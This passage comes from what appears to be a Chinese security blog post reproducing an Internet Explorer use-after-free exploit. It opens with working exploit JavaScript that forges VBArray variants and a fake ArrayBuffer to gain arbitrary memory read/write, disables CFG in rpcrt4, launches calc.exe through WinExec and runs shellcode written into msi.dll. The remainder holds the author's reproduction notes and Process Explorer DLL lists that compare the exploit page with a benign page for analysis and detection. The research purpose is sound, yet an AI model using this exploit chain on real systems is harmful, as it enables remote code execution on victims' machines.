// 2. Use the corrupted attribute value as a VBArray of forged VARIANTs to
//    read arbitrary dwords, then forge an ArrayBuffer to get a DataView
//    (`god`) with full read/write.
// 3. Resolve modules/exports, build the RPC call primitive, disable CFG in
//    rpcrt4, and finally run WinExec("calc.exe") and a tiny shellcode.

var god
// Object array used by addrOf(); its element storage is located below.
var arr = []
var fake = new ArrayBuffer(0x100)
var abf = new ArrayBuffer(0x20010)
var alloc = alloc2()
// Attribute nodes used as spray handles.
var hd0 = document.createAttribute(\'handle\')
var hd1 = document.createAttribute(\'handle\')
var hd2
// Element whose attribute list is cleared inside the callback.
var ele = document.createElement(\'element\')
var att = document.createAttribute(\'attribute\')
// valueOf runs while removeAttributeNode() still holds the old BSTR:
// clearAttributes() frees it, and the spray below reoccupies it.
att.nodeValue = 
    valueOf: function() 
        hd1.nodeValue = (new alloc1()).nodeValue
        // Clears every attribute bound to `ele` during the callback.
        ele.clearAttributes()
        hd2 = hd1.cloneNode()
        ele.setAttribute(\'attribute\', 1337)
    

ele.setAttributeNode(att)
// Large attribute string whose size matches the spray (0x20010 bytes).
ele.setAttribute(\'attr\', \'0\'.repeat((0x20010 - 6) / 2))
// Triggers the valueOf callback above (the UAF).
ele.removeAttributeNode(att)
hd0.nodeValue = alloc
// hd2 now carries bytes of the reclaimed memory; pull out two pointers
// (which fields these are is not established here — see the referenced analyses).
var leak = new Uint32Array(dump(hd2.nodeValue))
var pAbf = leak[6]
var pArr = leak[10]
var VT_I4 = 0x3
var VT_DISPATCH = 0x9
var VT_BYREF = 0x4000
var bufArr = new Array(0x10)
var fakeArr = new Uint32Array(fake)
// Forge 16 VT_BYREF|VT_I4 variants pointing at pAbf.. to read the
// ArrayBuffer object header through a VBArray.
for (var i = 0; i < 0x10; ++i) setData(i + 1, new Data(VT_BYREF | VT_I4, pAbf + i * 4))
flush()
var ref = new VBArray(hd0.nodeValue)
for (var i = 0; i < 0x10; ++i) bufArr[i] = ref.getItem(i + 1)
ref = null
// Second read: three dwords around the pointer found in bufArr[4].
setData(1, new Data(VT_BYREF | VT_I4, bufArr[4]))
setData(2, new Data(VT_BYREF | VT_I4, bufArr[4] + 0x04))
setData(3, new Data(VT_BYREF | VT_I4, bufArr[4] + 0x1c))
flush()
ref = new VBArray(hd0.nodeValue)
var vt = ref.getItem(1)
var gc = ref.getItem(2)
var bs = ref.getItem(3)
ref = null
// Build a fake ArrayBuffer object in `fake` from the leaked header; the
// 0xffffffff at index 24 presumably becomes its byte length — confirm.
for (var i = 0; i < 16; ++i) fakeArr[i] = bufArr[i]
fakeArr[4] = bs + 0x40
fakeArr[16] = vt
fakeArr[17] = gc
fakeArr[24] = 0xffffffff
// Hand the fake object back as a VT_DISPATCH and wrap it in a DataView.
setData(1, new Data(VT_DISPATCH, bs))
flush()
ref = new VBArray(hd0.nodeValue)
god = new DataView(ref.getItem(1))
ref = null
// Re-derive pArr through two pointer hops (presumably arr's element
// storage — confirm) so addrOf() reads the right slot.
pArr = read(read(pArr + 0x10, 32) + 0x14, 32) + 0x10
// Zero a field in hd0's native object (+0x28); purpose not established here.
write(read(addrOf(hd0) + 0x18, 32) + 0x28, 0, 32)

// Keep-alive registry for createArrayBuffer(); also used to find jscript9.
var map = new Map()
var jscript9 = getBase(read(addrOf(map), 32))
var rpcrt4 = getDllBase(jscript9, \'rpcrt4.dll\')
var msvcrt = getDllBase(jscript9, \'msvcrt.dll\')
var ntdll = getDllBase(msvcrt, \'ntdll.dll\')
var kernelbase = getDllBase(msvcrt, \'kernelbase.dll\')
var VirtualProtect = getProcAddr(kernelbase, \'VirtualProtect\')
var LoadLibraryExA = getProcAddr(kernelbase, \'LoadLibraryExA\')
// Attribute whose native object pointer (+0x18) call() temporarily replaces.
var xyz = document.createAttribute(\'xyz\')
var paoi = addrOf(xyz)
var patt = read(addrOf(xyz) + 0x18, 32)
var osf_vft = aos()
var msg = initRpc()
// Shadows the rpcFree() function with the fake object it returns.
var rpcFree = rpcFree()
killCfg(rpcrt4)

// Call WinExec to launch the calculator.
// NOTE(review): the `0,1` here are extra arguments to newStr() (ignored),
// not LoadLibraryExA's hFile/dwFlags — compare the msi.dll call below,
// which passes them to call2(). LoadLibraryExA therefore sees whatever
// setArgs() left in the remaining argument slots.
var kernel32 = call2(LoadLibraryExA,[newStr(\'kernel32.dll\',0,1)])
var WinExec = getProcAddr(kernel32,\'WinExec\')
call2(WinExec,[newStr(\'calc.exe\'),5])

// Run shellcode: write it into msi.dll+0x5000 (made writable, then the
// original protection — presumably executable — is restored) and call it.
var shellcode = new Uint8Array([0xb8, 0x37, 0x13, 0x00, 0x00, 0xc3])
var msi = call2(LoadLibraryExA, [newStr(\'msi.dll\'), 0, 1]) + 0x5000
var tmpBuffer = createArrayBuffer(4)
call2(VirtualProtect, [msi, shellcode.length, 0x4, tmpBuffer])
writeData(msi, shellcode) // mov eax, 0x1337 ; ret
call2(VirtualProtect, [msi, shellcode.length, read(tmpBuffer, 32), tmpBuffer])
var result = call2(msi, [])
// Per the shellcode's disassembly, this shows a dialog with 0x1337.
alert(result.toString(16))

</script>
</body>
</html>

 

注意细节:我是把 html 保存到本地,然后用 IE 直接打开本地文件复现的(本地文件和经服务器访问的页面所处的安全区域不同,见下文的对比),

C:\\Users\\bonelee\\Desktop\\1809.html

 

 

如果放到服务器上再通过 URL 访问,则不会弹出计算器,但仍会出现弹窗,如下。如果该弹窗就是脚本末尾 alert 显示的 1337,说明利用链本身已经跑完,只是 WinExec 启动计算器这一步没有可见效果。一个可能的原因是 Internet 区域的页面运行在 IE 保护模式(低完整性)的内容进程里,而本地文件不受同样的限制;可以用 Process Explorer 对比两种情况下 iexplore.exe 内容进程的完整性级别来确认。

 

我们使用proc exp采集下数据:

可以看到 iexplore.exe 下并没有 calc 子进程!从其加载的 dll 里,可以看到有 mshtml.dll!

 

可以看到计算器是 svchost.exe 派生出来的。这在 Windows 10 上一般是正常现象:calc.exe 只是一个启动器,真正的计算器是 UWP 应用,由 svchost 托管的应用激活服务拉起,所以父进程不是 iexplore.exe。做检测规则时不能只依赖“浏览器直接派生 calc.exe”这条父子进程关系。

 

我们重点看下 ie 加载的 dll 清单(注意 Process Explorer 的 DLL 视图也会列出映射进来的数据文件,比如下面的 .db/.nls/.dat/.clb 项,它们不是真正加载的模块):

Process: iexplore.exe Pid: 2280

Name	Description	Company Name	Path
6AF0698E-D558-4F6E-9B3C-3716689AF493.2.ver0x0000000000000001.db			C:\\ProgramData\\Microsoft\\Windows\\Caches\\6AF0698E-D558-4F6E-9B3C-3716689AF493.2.ver0x0000000000000001.db
AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9.1.ver0x0000000000000001.db			C:\\Users\\bonelee\\AppData\\Local\\Microsoft\\Windows\\Caches\\AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9.1.ver0x0000000000000001.db
DDF571F2-BE98-426D-8288-1A9A39C3FDA2.2.ver0x0000000000000001.db			C:\\ProgramData\\Microsoft\\Windows\\Caches\\DDF571F2-BE98-426D-8288-1A9A39C3FDA2.2.ver0x0000000000000001.db
advapi32.dll	Advanced Windows 32 Base API	Microsoft Corporation	C:\\Windows\\SysWOW64\\advapi32.dll
apphelp.dll	应用程序兼容性客户端库	Microsoft Corporation	C:\\Windows\\SysWOW64\\apphelp.dll
bcrypt.dll	Windows Cryptographic Primitives Library (Wow64)	Microsoft Corporation	C:\\Windows\\SysWOW64\\bcrypt.dll
bcryptprimitives.dll	Windows Cryptographic Primitives Library	Microsoft Corporation	C:\\Windows\\SysWOW64\\bcryptprimitives.dll
C_1252.NLS			C:\\Windows\\System32\\C_1252.NLS
cfgmgr32.dll	Configuration Manager DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\cfgmgr32.dll
clbcatq.dll	COM+ Configuration Catalog	Microsoft Corporation	C:\\Windows\\SysWOW64\\clbcatq.dll
combase.dll	Microsoft COM for Windows	Microsoft Corporation	C:\\Windows\\SysWOW64\\combase.dll
comctl32.dll	用户体验控件库	Microsoft Corporation	C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.737_none_588eeadb78ace734\\comctl32.dll
comctl32.dll	用户体验控件库	Microsoft Corporation	C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_4d637a531b9a7e51\\comctl32.dll
comdlg32.dll	Common Dialogs DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\comdlg32.dll
coml2.dll	Microsoft COM for Windows	Microsoft Corporation	C:\\Windows\\SysWOW64\\coml2.dll
CoreMessaging.dll	Microsoft CoreMessaging Dll	Microsoft Corporation	C:\\Windows\\SysWOW64\\CoreMessaging.dll
CoreUIComponents.dll	Microsoft Core UI Components Dll	Microsoft Corporation	C:\\Windows\\SysWOW64\\CoreUIComponents.dll
crypt32.dll	Crypto API32	Microsoft Corporation	C:\\Windows\\SysWOW64\\crypt32.dll
cryptbase.dll	Base cryptographic API DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\cryptbase.dll
cryptsp.dll	Cryptographic Service Provider API	Microsoft Corporation	C:\\Windows\\SysWOW64\\cryptsp.dll
cversions.2.db			C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db
cversions.2.db			C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db
d2d1.dll	Microsoft D2D Library	Microsoft Corporation	C:\\Windows\\SysWOW64\\d2d1.dll
d3d11.dll	Direct3D 11 Runtime	Microsoft Corporation	C:\\Windows\\SysWOW64\\d3d11.dll
DataExchange.dll	Data exchange	Microsoft Corporation	C:\\Windows\\SysWOW64\\DataExchange.dll
dcomp.dll	Microsoft DirectComposition Library	Microsoft Corporation	C:\\Windows\\SysWOW64\\dcomp.dll
directmanipulation.dll	Microsoft Direct Manipulation Component	Microsoft Corporation	C:\\Windows\\SysWOW64\\directmanipulation.dll
dwmapi.dll	Microsoft Desktop Window Manager API	Microsoft Corporation	C:\\Windows\\SysWOW64\\dwmapi.dll
DWrite.dll	Microsoft DirectX Typography Services	Microsoft Corporation	C:\\Windows\\SysWOW64\\DWrite.dll
dxgi.dll	DirectX Graphics Infrastructure	Microsoft Corporation	C:\\Windows\\SysWOW64\\dxgi.dll
efswrt.dll	Storage Protection Windows Runtime DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\efswrt.dll
gdi32.dll	GDI Client DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\gdi32.dll
gdi32full.dll	GDI Client DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\gdi32full.dll
ieapfltr.dll	Microsoft SmartScreen Filter	Microsoft Corporation	C:\\Windows\\SysWOW64\\ieapfltr.dll
ieframe.dll	Internet 浏览器	Microsoft Corporation	C:\\Windows\\SysWOW64\\ieframe.dll
ieframe.dll.mui	Internet 浏览器	Microsoft Corporation	C:\\Windows\\System32\\zh-CN\\ieframe.dll.mui
ieproxy.dll	IE ActiveX Interface Marshaling Library	Microsoft Corporation	C:\\Windows\\SysWOW64\\ieproxy.dll
iertutil.dll	Internet Explorer 的运行时实用程序	Microsoft Corporation	C:\\Windows\\SysWOW64\\iertutil.dll
IEShims.dll	Internet Explorer Compatibility Shims	Microsoft Corporation	C:\\Program Files (x86)\\Internet Explorer\\IEShims.dll
ieui.dll	Internet Explorer UI 引擎	Microsoft Corporation	C:\\Windows\\SysWOW64\\ieui.dll
iexplore.exe	Internet Explorer	Microsoft Corporation	C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe
iexplore.exe.mui	Internet Explorer	Microsoft Corporation	C:\\Program Files\\internet explorer\\zh-CN\\iexplore.exe.mui
imageres.dll	Windows Image Resource	Microsoft Corporation	C:\\Windows\\SysWOW64\\imageres.dll
imageres.dll.mui	Windows Image Resource	Microsoft Corporation	C:\\Windows\\System32\\en-US\\imageres.dll.mui
imm32.dll	Multi-User Windows IMM32 API Client DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\imm32.dll
IPHLPAPI.DLL	IP Helper API	Microsoft Corporation	C:\\Windows\\SysWOW64\\IPHLPAPI.DLL
jscript9.dll	Microsoft (R) JScript	Microsoft Corporation	C:\\Windows\\SysWOW64\\jscript9.dll
kernel.appcore.dll	AppModel API Host	Microsoft Corporation	C:\\Windows\\SysWOW64\\kernel.appcore.dll
kernel32.dll	Windows NT BASE API Client DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\kernel32.dll
KernelBase.dll	Windows NT BASE API Client DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\KernelBase.dll
KernelBase.dll.mui	Windows NT 基本 API 客户端 DLL	Microsoft Corporation	C:\\Windows\\System32\\zh-CN\\KernelBase.dll.mui
locale.nls			C:\\Windows\\System32\\locale.nls
mlang.dll	Multi Language Support DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\mlang.dll
mlang.dll.mui	多语言支持 DLL	Microsoft Corporation	C:\\Windows\\System32\\zh-CN\\mlang.dll.mui
mpr.dll	Multiple Provider Router DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\mpr.dll
msasn1.dll	ASN.1 Runtime APIs	Microsoft Corporation	C:\\Windows\\SysWOW64\\msasn1.dll
msctf.dll	MSCTF Server DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\msctf.dll
mshtml.dll	Microsoft (R) HTML 查看器	Microsoft Corporation	C:\\Windows\\SysWOW64\\mshtml.dll
mshtml.dll.mui	Microsoft (R) HTML 查看器	Microsoft Corporation	C:\\Windows\\System32\\zh-CN\\mshtml.dll.mui
msi.dll	Windows Installer	Microsoft Corporation	C:\\Windows\\SysWOW64\\msi.dll
msimtf.dll	Active IMM Server DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\msimtf.dll
msIso.dll	Isolation Library for Internet Explorer	Microsoft Corporation	C:\\Windows\\SysWOW64\\msIso.dll
msvcp_win.dll	Microsoft® C Runtime Library	Microsoft Corporation	C:\\Windows\\SysWOW64\\msvcp_win.dll
msvcrt.dll	Windows NT CRT DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\msvcrt.dll
mswsock.dll	Microsoft Windows Sockets 2.0 Service Provider	Microsoft Corporation	C:\\Windows\\SysWOW64\\mswsock.dll
netapi32.dll	Net Win32 API DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\netapi32.dll
netmsg.dll	网络消息 DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\netmsg.dll
netmsg.dll.mui	网络消息 DLL	Microsoft Corporation	C:\\Windows\\System32\\zh-CN\\netmsg.dll.mui
netutils.dll	Net Win32 API Helpers DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\netutils.dll
ninput.dll	Microsoft Pen and Touch Input Component	Microsoft Corporation	C:\\Windows\\SysWOW64\\ninput.dll
nsi.dll	NSI User-mode interface DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\nsi.dll
ntdll.dll	NT 层 DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\ntdll.dll
ntdll.dll	NT 层 DLL	Microsoft Corporation	C:\\Windows\\System32\\ntdll.dll
ntmarta.dll	Windows NT MARTA provider	Microsoft Corporation	C:\\Windows\\SysWOW64\\ntmarta.dll
ole32.dll	Microsoft OLE for Windows	Microsoft Corporation	C:\\Windows\\SysWOW64\\ole32.dll
oleaut32.dll	OLEAUT32.DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\oleaut32.dll
OnDemandConnRouteHelper.dll	On Demand Connctiond Route Helper	Microsoft Corporation	C:\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll
OneCoreCommonProxyStub.dll	OneCore Common Proxy Stub	Microsoft Corporation	C:\\Windows\\SysWOW64\\OneCoreCommonProxyStub.dll
OneCoreUAPCommonProxyStub.dll	OneCoreUAP Common Proxy Stub	Microsoft Corporation	C:\\Windows\\SysWOW64\\OneCoreUAPCommonProxyStub.dll
powrprof.dll	Power Profile Helper DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\powrprof.dll
profapi.dll	User Profile Basic API	Microsoft Corporation	C:\\Windows\\SysWOW64\\profapi.dll
propsys.dll	Microsoft 属性系统	Microsoft Corporation	C:\\Windows\\SysWOW64\\propsys.dll
propsys.dll.mui	Microsoft 属性系统	Microsoft Corporation	C:\\Windows\\System32\\zh-CN\\propsys.dll.mui
R000000000006.clb			C:\\Windows\\Registration\\R000000000006.clb
rmclient.dll	Resource Manager Client	Microsoft Corporation	C:\\Windows\\SysWOW64\\rmclient.dll
rpcrt4.dll	远程过程调用运行时	Microsoft Corporation	C:\\Windows\\SysWOW64\\rpcrt4.dll
scrrun.dll	Microsoft ® Script Runtime	Microsoft Corporation	C:\\Windows\\SysWOW64\\scrrun.dll
scrrun.dll	Microsoft ® Script Runtime	Microsoft Corporation	C:\\Windows\\SysWOW64\\scrrun.dll
sechost.dll	Host for SCM/SDDL/LSA Lookup APIs	Microsoft Corporation	C:\\Windows\\SysWOW64\\sechost.dll
secur32.dll	Security Support Provider Interface	Microsoft Corporation	C:\\Windows\\SysWOW64\\secur32.dll
SHCore.dll	SHCORE	Microsoft Corporation	C:\\Windows\\SysWOW64\\SHCore.dll
shell32.dll	Windows Shell Common Dll	Microsoft Corporation	C:\\Windows\\SysWOW64\\shell32.dll
shlwapi.dll	外壳简易实用工具库	Microsoft Corporation	C:\\Windows\\SysWOW64\\shlwapi.dll
SortDefault.nls			C:\\Windows\\Globalization\\Sorting\\SortDefault.nls
srpapi.dll	SRP APIs Dll	Microsoft Corporation	C:\\Windows\\SysWOW64\\srpapi.dll
sspicli.dll	Security Support Provider Interface	Microsoft Corporation	C:\\Windows\\SysWOW64\\sspicli.dll
StaticCache.dat			C:\\Windows\\Fonts\\StaticCache.dat
SuggestedSites.dat			C:\\Users\\bonelee\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Low\\SuggestedSites.dat
sxs.dll	Fusion 2.5	Microsoft Corporation	C:\\Windows\\SysWOW64\\sxs.dll
TextInputFramework.dll	"TextInputFramework.DYNLINK"	Microsoft Corporation	C:\\Windows\\SysWOW64\\TextInputFramework.dll
tokenbinding.dll	Token Binding Protocol	Microsoft Corporation	C:\\Windows\\SysWOW64\\tokenbinding.dll
twinapi.appcore.dll	twinapi.appcore	Microsoft Corporation	C:\\Windows\\SysWOW64\\twinapi.appcore.dll
ucrtbase.dll	Microsoft® C Runtime Library	Microsoft Corporation	C:\\Windows\\SysWOW64\\ucrtbase.dll
urlmon.dll	Win32 的 OLE32 扩展	Microsoft Corporation	C:\\Windows\\SysWOW64\\urlmon.dll
urlmon.dll.mui	Win32 的 OLE32 扩展	Microsoft Corporation	C:\\Windows\\System32\\zh-CN\\urlmon.dll.mui
user32.dll	多用户 Windows 用户 API 客户端 DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\user32.dll
uxtheme.dll	Microsoft UxTheme Library	Microsoft Corporation	C:\\Windows\\SysWOW64\\uxtheme.dll
vaultcli.dll	Credential Vault Client Library	Microsoft Corporation	C:\\Windows\\SysWOW64\\vaultcli.dll
version.dll	Version Checking and File Installation Libraries	Microsoft Corporation	C:\\Windows\\SysWOW64\\version.dll
vm3dum_10.dll	VMware SVGA 3D D3D10 Client Driver	VMware, Inc.	C:\\Windows\\SysWOW64\\vm3dum_10.dll
vm3dum_loader.dll	VMware SVGA 3D Usermode Driver Loader	VMware, Inc.	C:\\Windows\\SysWOW64\\vm3dum_loader.dll
win32u.dll	Win32u	Microsoft Corporation	C:\\Windows\\SysWOW64\\win32u.dll
windows.storage.dll	Microsoft WinRT Storage API	Microsoft Corporation	C:\\Windows\\SysWOW64\\windows.storage.dll
winhttp.dll	Windows HTTP Services	Microsoft Corporation	C:\\Windows\\SysWOW64\\winhttp.dll
wininet.dll	Internet Extensions for Win32	Microsoft Corporation	C:\\Windows\\SysWOW64\\wininet.dll
winmm.dll	MCI API DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\winmm.dll
winmmbase.dll	Base Multimedia Extension API DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\winmmbase.dll
winnsi.dll	Network Store Information RPC interface	Microsoft Corporation	C:\\Windows\\SysWOW64\\winnsi.dll
wintrust.dll	Microsoft Trust Verification APIs	Microsoft Corporation	C:\\Windows\\SysWOW64\\wintrust.dll
WinTypes.dll	Windows Base Types DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\WinTypes.dll
wkscli.dll	Workstation Service Client DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\wkscli.dll
wldp.dll	Windows Lockdown Policy	Microsoft Corporation	C:\\Windows\\SysWOW64\\wldp.dll
wow64.dll	Win32 Emulation on NT64	Microsoft Corporation	C:\\Windows\\System32\\wow64.dll
wow64cpu.dll	AMD64 Wow64 CPU 	Microsoft Corporation	C:\\Windows\\System32\\wow64cpu.dll
wow64win.dll	Wow64 Console and Win32 API Logging	Microsoft Corporation	C:\\Windows\\System32\\wow64win.dll
ws2_32.dll	Windows Socket 2.0 32-Bit DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\ws2_32.dll

 

 

太多了,不知道问题在哪里!我单独创建一个正常的html文件,然后使用ie加载,文件内容如下:

<html>
start!
<script>
alert("hi");
</script>
</html>

 运行后,

 加载的dll如下:

Process: iexplore.exe Pid: 4808

Name	Description	Company Name	Path
6AF0698E-D558-4F6E-9B3C-3716689AF493.2.ver0x0000000000000001.db			C:\\ProgramData\\Microsoft\\Windows\\Caches\\6AF0698E-D558-4F6E-9B3C-3716689AF493.2.ver0x0000000000000001.db
AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9.1.ver0x0000000000000001.db			C:\\Users\\bonelee\\AppData\\Local\\Microsoft\\Windows\\Caches\\AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9.1.ver0x0000000000000001.db
DDF571F2-BE98-426D-8288-1A9A39C3FDA2.2.ver0x0000000000000001.db			C:\\ProgramData\\Microsoft\\Windows\\Caches\\DDF571F2-BE98-426D-8288-1A9A39C3FDA2.2.ver0x0000000000000001.db
~FontCache-FontFace.dat			C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat
~FontCache-S-1-5-21-2730912745-1723166478-227975165-1000.dat			C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-2730912745-1723166478-227975165-1000.dat
~FontCache-System.dat			C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat
advapi32.dll	Advanced Windows 32 Base API	Microsoft Corporation	C:\\Windows\\SysWOW64\\advapi32.dll
apphelp.dll	应用程序兼容性客户端库	Microsoft Corporation	C:\\Windows\\SysWOW64\\apphelp.dll
bcrypt.dll	Windows Cryptographic Primitives Library (Wow64)	Microsoft Corporation	C:\\Windows\\SysWOW64\\bcrypt.dll
bcryptprimitives.dll	Windows Cryptographic Primitives Library	Microsoft Corporation	C:\\Windows\\SysWOW64\\bcryptprimitives.dll
C_1252.NLS			C:\\Windows\\System32\\C_1252.NLS
cfgmgr32.dll	Configuration Manager DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\cfgmgr32.dll
clbcatq.dll	COM+ Configuration Catalog	Microsoft Corporation	C:\\Windows\\SysWOW64\\clbcatq.dll
combase.dll	Microsoft COM for Windows	Microsoft Corporation	C:\\Windows\\SysWOW64\\combase.dll
comctl32.dll	用户体验控件库	Microsoft Corporation	C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.737_none_588eeadb78ace734\\comctl32.dll
comctl32.dll	用户体验控件库	Microsoft Corporation	C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_4d637a531b9a7e51\\comctl32.dll
comdlg32.dll	Common Dialogs DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\comdlg32.dll
CoreMessaging.dll	Microsoft CoreMessaging Dll	Microsoft Corporation	C:\\Windows\\SysWOW64\\CoreMessaging.dll
CoreUIComponents.dll	Microsoft Core UI Components Dll	Microsoft Corporation	C:\\Windows\\SysWOW64\\CoreUIComponents.dll
crypt32.dll	Crypto API32	Microsoft Corporation	C:\\Windows\\SysWOW64\\crypt32.dll
cryptbase.dll	Base cryptographic API DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\cryptbase.dll
cryptsp.dll	Cryptographic Service Provider API	Microsoft Corporation	C:\\Windows\\SysWOW64\\cryptsp.dll
cversions.2.db			C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db
cversions.2.db			C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db
d2d1.dll	Microsoft D2D Library	Microsoft Corporation	C:\\Windows\\SysWOW64\\d2d1.dll
d3d11.dll	Direct3D 11 Runtime	Microsoft Corporation	C:\\Windows\\SysWOW64\\d3d11.dll
DataExchange.dll	Data exchange	Microsoft Corporation	C:\\Windows\\SysWOW64\\DataExchange.dll
dcomp.dll	Microsoft DirectComposition Library	Microsoft Corporation	C:\\Windows\\SysWOW64\\dcomp.dll
directmanipulation.dll	Microsoft Direct Manipulation Component	Microsoft Corporation	C:\\Windows\\SysWOW64\\directmanipulation.dll
dwmapi.dll	Microsoft Desktop Window Manager API	Microsoft Corporation	C:\\Windows\\SysWOW64\\dwmapi.dll
DWrite.dll	Microsoft DirectX Typography Services	Microsoft Corporation	C:\\Windows\\SysWOW64\\DWrite.dll
dxgi.dll	DirectX Graphics Infrastructure	Microsoft Corporation	C:\\Windows\\SysWOW64\\dxgi.dll
efswrt.dll	Storage Protection Windows Runtime DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\efswrt.dll
gdi32.dll	GDI Client DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\gdi32.dll
gdi32full.dll	GDI Client DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\gdi32full.dll
ieapfltr.dll	Microsoft SmartScreen Filter	Microsoft Corporation	C:\\Windows\\SysWOW64\\ieapfltr.dll
ieframe.dll	Internet 浏览器	Microsoft Corporation	C:\\Windows\\SysWOW64\\ieframe.dll
ieframe.dll.mui	Internet 浏览器	Microsoft Corporation	C:\\Windows\\System32\\zh-CN\\ieframe.dll.mui
ieproxy.dll	IE ActiveX Interface Marshaling Library	Microsoft Corporation	C:\\Windows\\SysWOW64\\ieproxy.dll
iertutil.dll	Internet Explorer 的运行时实用程序	Microsoft Corporation	C:\\Windows\\SysWOW64\\iertutil.dll
IEShims.dll	Internet Explorer Compatibility Shims	Microsoft Corporation	C:\\Program Files (x86)\\Internet Explorer\\IEShims.dll
ieui.dll	Internet Explorer UI 引擎	Microsoft Corporation	C:\\Windows\\SysWOW64\\ieui.dll
iexplore.exe	Internet Explorer	Microsoft Corporation	C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe
iexplore.exe.mui	Internet Explorer	Microsoft Corporation	C:\\Program Files\\internet explorer\\zh-CN\\iexplore.exe.mui
imageres.dll	Windows Image Resource	Microsoft Corporation	C:\\Windows\\SysWOW64\\imageres.dll
imageres.dll.mui	Windows Image Resource	Microsoft Corporation	C:\\Windows\\System32\\en-US\\imageres.dll.mui
imm32.dll	Multi-User Windows IMM32 API Client DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\imm32.dll
IPHLPAPI.DLL	IP Helper API	Microsoft Corporation	C:\\Windows\\SysWOW64\\IPHLPAPI.DLL
jscript9.dll	Microsoft (R) JScript	Microsoft Corporation	C:\\Windows\\SysWOW64\\jscript9.dll
kernel.appcore.dll	AppModel API Host	Microsoft Corporation	C:\\Windows\\SysWOW64\\kernel.appcore.dll
kernel32.dll	Windows NT BASE API Client DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\kernel32.dll
KernelBase.dll	Windows NT BASE API Client DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\KernelBase.dll
locale.nls			C:\\Windows\\System32\\locale.nls
mlang.dll	Multi Language Support DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\mlang.dll
mlang.dll.mui	多语言支持 DLL	Microsoft Corporation	C:\\Windows\\System32\\zh-CN\\mlang.dll.mui
mpr.dll	Multiple Provider Router DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\mpr.dll
msasn1.dll	ASN.1 Runtime APIs	Microsoft Corporation	C:\\Windows\\SysWOW64\\msasn1.dll
msctf.dll	MSCTF Server DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\msctf.dll
mshtml.dll	Microsoft (R) HTML 查看器	Microsoft Corporation	C:\\Windows\\SysWOW64\\mshtml.dll
mshtml.dll.mui	Microsoft (R) HTML 查看器	Microsoft Corporation	C:\\Windows\\System32\\zh-CN\\mshtml.dll.mui
msimtf.dll	Active IMM Server DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\msimtf.dll
msIso.dll	Isolation Library for Internet Explorer	Microsoft Corporation	C:\\Windows\\SysWOW64\\msIso.dll
msvcp_win.dll	Microsoft® C Runtime Library	Microsoft Corporation	C:\\Windows\\SysWOW64\\msvcp_win.dll
msvcrt.dll	Windows NT CRT DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\msvcrt.dll
mswsock.dll	Microsoft Windows Sockets 2.0 Service Provider	Microsoft Corporation	C:\\Windows\\SysWOW64\\mswsock.dll
netapi32.dll	Net Win32 API DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\netapi32.dll
netutils.dll	Net Win32 API Helpers DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\netutils.dll
ninput.dll	Microsoft Pen and Touch Input Component	Microsoft Corporation	C:\\Windows\\SysWOW64\\ninput.dll
nsi.dll	NSI User-mode interface DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\nsi.dll
